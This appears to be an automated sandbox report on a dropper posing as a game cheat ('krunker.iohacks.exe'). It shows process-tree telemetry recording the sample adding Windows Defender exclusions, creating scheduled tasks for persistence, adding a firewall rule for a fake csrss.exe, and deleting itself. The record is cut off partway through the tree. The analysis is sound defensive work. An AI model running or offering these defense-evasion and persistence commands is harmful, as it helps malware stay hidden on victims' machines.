PID 3820 wrote to memory of 4460	3820	cmd.exe	RIP_YOUR_PC_LOL.exe
PID 3820 wrote to memory of 4460	3820	cmd.exe	RIP_YOUR_PC_LOL.exe
PID 3820 wrote to memory of 4460	3820	cmd.exe	RIP_YOUR_PC_LOL.exe
PID 3820 wrote to memory of 4388	3820	cmd.exe	ska2pwej.aeh.exe
PID 3820 wrote to memory of 4388	3820	cmd.exe	ska2pwej.aeh.exe
PID 3820 wrote to memory of 4388	3820	cmd.exe	ska2pwej.aeh.exe
PID 1492 wrote to memory of 1988	1492	[email protected]	attrib.exe
PID 1492 wrote to memory of 1988	1492	[email protected]	attrib.exe
PID 1492 wrote to memory of 1988	1492	[email protected]	attrib.exe
PID 1492 wrote to memory of 3176	1492	[email protected]	svchost.com
PID 1492 wrote to memory of 3176	1492	[email protected]	svchost.com
PID 1492 wrote to memory of 3176	1492	[email protected]	svchost.com
PID 4460 wrote to memory of 556	4460	RIP_YOUR_PC_LOL.exe	svchost.com
PID 4460 wrote to memory of 556	4460	RIP_YOUR_PC_LOL.exe	svchost.com
PID 4460 wrote to memory of 556	4460	RIP_YOUR_PC_LOL.exe	svchost.com
PID 4388 wrote to memory of 4940	4388	ska2pwej.aeh.exe	ska2pwej.aeh.tmp
PID 4388 wrote to memory of 4940	4388	ska2pwej.aeh.exe	ska2pwej.aeh.tmp
PID 4388 wrote to memory of 4940	4388	ska2pwej.aeh.exe	ska2pwej.aeh.tmp
PID 3672 wrote to memory of 2132	3672	bot.exe	bot.exe
PID 3672 wrote to memory of 2132	3672	bot.exe	bot.exe
PID 3672 wrote to memory of 2132	3672	bot.exe	bot.exe
PID 556 wrote to memory of 4568	556	1.exe	cmd.exe
PID 556 wrote to memory of 4568	556	1.exe	cmd.exe
PID 1492 wrote to memory of 1540	1492	[email protected]	taskdl.exe
PID 1492 wrote to memory of 1540	1492	[email protected]	taskdl.exe
PID 1492 wrote to memory of 1540	1492	[email protected]	taskdl.exe
PID 1492 wrote to memory of 1432	1492	[email protected]	Conhost.exe
PID 1492 wrote to memory of 1432	1492	[email protected]	Conhost.exe
PID 1492 wrote to memory of 1432	1492	[email protected]	Conhost.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

4300 attrib.exe
5772 attrib.exe
1988 attrib.exe

pid	process
4300	attrib.exe
5772	attrib.exe
1988	attrib.exe

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3820
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
    "4363463463464363463463463.exe"
    3⤵
    - Executes dropped EXE
    PID:2912
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe"
      4⤵
      PID:3176
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe
        5⤵
        
        PID:5304
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U43C0~1.EXE"
        6⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\U43C0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U43C0~1.EXE
        7⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 984
        8⤵
        Program crash
        
        PID:6844
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U43C1~1.EXE"
        6⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\U43C1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U43C1~1.EXE
        7⤵
        
        PID:5152
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        8⤵
        
        PID:7808
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:212
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 1000
        6⤵
        Program crash
        
        PID:1560
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe"
      4⤵
      PID:4396
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe
        5⤵
        
        PID:5488
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\AFBFHDBKJE.exe"
        6⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\AFBFHDBKJE.exe
        7⤵
        
        PID:7880
        
        C:\Users\Admin\AppData\Local\Temp\AFBFHDBKJE.exe
        
        C:\Users\Admin\AppData\Local\Temp\AFBFHDBKJE.exe
        8⤵
        
        PID:1692
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\AFBFHDBKJE.exe
        9⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\AFBFHDBKJE.exe
        10⤵
        
        PID:6172
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        11⤵
        Runs ping.exe
        
        PID:4588
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 2340
        6⤵
        Program crash
        
        PID:7244
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svcrun.exe"
      4⤵
      PID:1680
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svcrun.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svcrun.exe
        5⤵
        
        PID:1144
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        6⤵
        
        PID:276
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        6⤵
        
        PID:6456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFC2E.tmp.bat""
        6⤵
        
        PID:6408
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6016
        
        C:\ProgramData\common\JTPFKOXW.exe
        
        "C:\ProgramData\common\JTPFKOXW.exe"
        7⤵
        
        PID:4408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        8⤵
        
        PID:7284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        8⤵
        
        PID:8100
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JTPFKOXW" /tr "C:\ProgramData\common\JTPFKOXW.exe"
        8⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn JTPFKOXW /tr C:\ProgramData\common\JTPFKOXW.exe
        9⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn JTPFKOXW /tr C:\ProgramData\common\JTPFKOXW.exe
        10⤵
        Creates scheduled task(s)
        
        PID:5212
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CE0B95~1.EXE"
      4⤵
      PID:6476
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CE0B95~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CE0B95~1.EXE
        5⤵
        
        PID:6660
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6656
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6764
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe"
      4⤵
      PID:6280
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe
        5⤵
        
        PID:6380
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Akh.exe"
      4⤵
      PID:6216
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Akh.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Akh.exe
        5⤵
        
        PID:6560
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
        6⤵
        
        PID:6320
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        6⤵
        
        PID:5888
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\6KADDB~1.EXE"
        7⤵
        
        PID:7484
        
        C:\Users\Admin\Pictures\6KADDB~1.EXE
        
        C:\Users\Admin\Pictures\6KADDB~1.EXE
        8⤵
        
        PID:7792
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U60G0~1.EXE"
        9⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Local\Temp\U60G0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U60G0~1.EXE
        10⤵
        
        PID:1264
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1020
        11⤵
        Program crash
        
        PID:6532
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U60G1~1.EXE"
        9⤵
        
        PID:7812
        
        C:\Users\Admin\AppData\Local\Temp\U60G1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U60G1~1.EXE
        10⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 1044
        9⤵
        Program crash
        
        PID:6332
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\YHUEKR~1.EXE"
        7⤵
        
        PID:7716
        
        C:\Users\Admin\Pictures\YHUEKR~1.EXE
        
        C:\Users\Admin\Pictures\YHUEKR~1.EXE
        8⤵
        
        PID:7984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:2584
        
        C:\Users\Admin\Pictures\YHUEKR~1.EXE
        
        "C:\Users\Admin\Pictures\YHUEKR~1.EXE"
        9⤵
        
        PID:6776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        
        PID:4208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        10⤵
        
        PID:3648
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\EKFFGE~1.EXE"
        7⤵
        
        PID:7900
        
        C:\Users\Admin\Pictures\EKFFGE~1.EXE
        
        C:\Users\Admin\Pictures\EKFFGE~1.EXE
        8⤵
        
        PID:6568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:6648
        
        C:\Users\Admin\Pictures\EKFFGE~1.EXE
        
        "C:\Users\Admin\Pictures\EKFFGE~1.EXE"
        9⤵
        
        PID:780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        
        PID:2452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        10⤵
        
        PID:7132
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\JZQSX5~1.EXE"
        7⤵
        
        PID:8100
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\PERPI8~1.EXE"
        7⤵
        
        PID:6944
        
        C:\Users\Admin\Pictures\PERPI8~1.EXE
        
        C:\Users\Admin\Pictures\PERPI8~1.EXE
        8⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\7zS9B7B.tmp\Install.exe
        
        .\Install.exe /hTsdidwmLR "385118" /S
        9⤵
        
        PID:7756
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m where.exe /c cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 17:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\wBMYxQl.exe\" my /Fysite_idTgJ 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:4340
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bvsYAGfGVfhExjZmnp"
        10⤵
        
        PID:7260
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\LRJ1KC~1.EXE" --silent --allusers=0
        7⤵
        
        PID:6364
        
        C:\Users\Admin\Pictures\LRJ1KC~1.EXE
        
        C:\Users\Admin\Pictures\LRJ1KC~1.EXE --silent --allusers=0
        8⤵
        
        PID:7824
        
        C:\Users\Admin\Pictures\LRJ1KC~1.EXE
        
        C:\Users\Admin\Pictures\LRJ1KC~1.EXE --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x29c,0x2a0,0x2a4,0x274,0x2a8,0x67b1e1d0,0x67b1e1dc,0x67b1e1e8
        9⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LRJ1KC~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LRJ1KC~1.EXE" --version
        9⤵
        
        PID:7468
        
        C:\Users\Admin\Pictures\LRJ1KC~1.EXE
        
        "C:\Users\Admin\Pictures\LRJ1KC~1.EXE" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=7824 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240409174717" --session-guid=a9b7191b-0724-4d98-9bf9-dbdd2668541f --server-tracking-blob=MGU3ZjNlYjFiYzZkYjc2ZjlmNTJkODlhYjU2MDVkNDE0NzY1ZDZiNjU4NTUyNTk0ZDc4MDBiNjY2YTc2NWY5Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N183ODkiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTI2ODQ4MTcuMjg1MCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N183ODkiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjI0Y2ZlMmE5LTZiMjMtNGRjMS1hYTNiLTNmOTYzZTYwODkyNSJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000
        9⤵
        
        PID:6964
        
        C:\Users\Admin\Pictures\LRJ1KC~1.EXE
        
        C:\Users\Admin\Pictures\LRJ1KC~1.EXE --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x298,0x2a8,0x2ac,0x274,0x2b0,0x68e6e1d0,0x68e6e1dc,0x68e6e1e8
        10⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\installer.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\installer.exe" --backend --initial-pid=7824 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --show-intro-overlay --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171" --session-guid=a9b7191b-0724-4d98-9bf9-dbdd2668541f --server-tracking-blob=MGU3ZjNlYjFiYzZkYjc2ZjlmNTJkODlhYjU2MDVkNDE0NzY1ZDZiNjU4NTUyNTk0ZDc4MDBiNjY2YTc2NWY5Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N183ODkiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTI2ODQ4MTcuMjg1MCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N183ODkiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjI0Y2ZlMmE5LTZiMjMtNGRjMS1hYTNiLTNmOTYzZTYwODkyNSJ9 --silent --desktopshortcut=1 --install-subfolder=109.0.5097.38
        10⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\installer.exe
        
        C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x260,0x264,0x268,0x23c,0x26c,0x7ffece797c80,0x7ffece797c8c,0x7ffece797c98
        11⤵
        
        PID:6444
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --copyonly=0 --allusers=0
        11⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x3c0040,0x3c004c,0x3c0058
        12⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --ran-launcher --install-extension="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\be76331b95dfc399cd776d2fc68021e0db03cc4f.crx"
        11⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\opera_crashreporter.exe
        
        C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x284,0x288,0x28c,0x280,0x290,0x7ffec4537590,0x7ffec45375a0,0x7ffec45375b0
        12⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
        9⤵
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\assistant_installer.exe" --version
        9⤵
        
        PID:1160
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091747171\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x360040,0x36004c,0x360058
        10⤵
        
        PID:7664
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\FETMW7~1.EXE"
        7⤵
        
        PID:7888
        
        C:\Users\Admin\Pictures\FETMW7~1.EXE
        
        C:\Users\Admin\Pictures\FETMW7~1.EXE
        8⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\7zSAE18.tmp\Install.exe
        
        .\Install.exe /hTsdidwmLR "385118" /S
        9⤵
        
        PID:7480
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m where.exe /c cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 17:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\LjYugcU.exe\" my /Fksite_idiuY 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:2448
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bvsYAGfGVfhExjZmnp"
        10⤵
        
        PID:5844
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\4XRVXP~1.EXE"
        7⤵
        
        PID:5992
        
        C:\Users\Admin\Pictures\4XRVXP~1.EXE
        
        C:\Users\Admin\Pictures\4XRVXP~1.EXE
        8⤵
        
        PID:7120
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U5HS0~1.EXE"
        9⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\U5HS0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U5HS0~1.EXE
        10⤵
        
        PID:7484
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1164
        11⤵
        Program crash
        
        PID:3636
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U5HS1~1.EXE"
        9⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\U5HS1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U5HS1~1.EXE
        10⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 812
        9⤵
        Program crash
        
        PID:1064
        
        C:\Windows\svchost.com
        
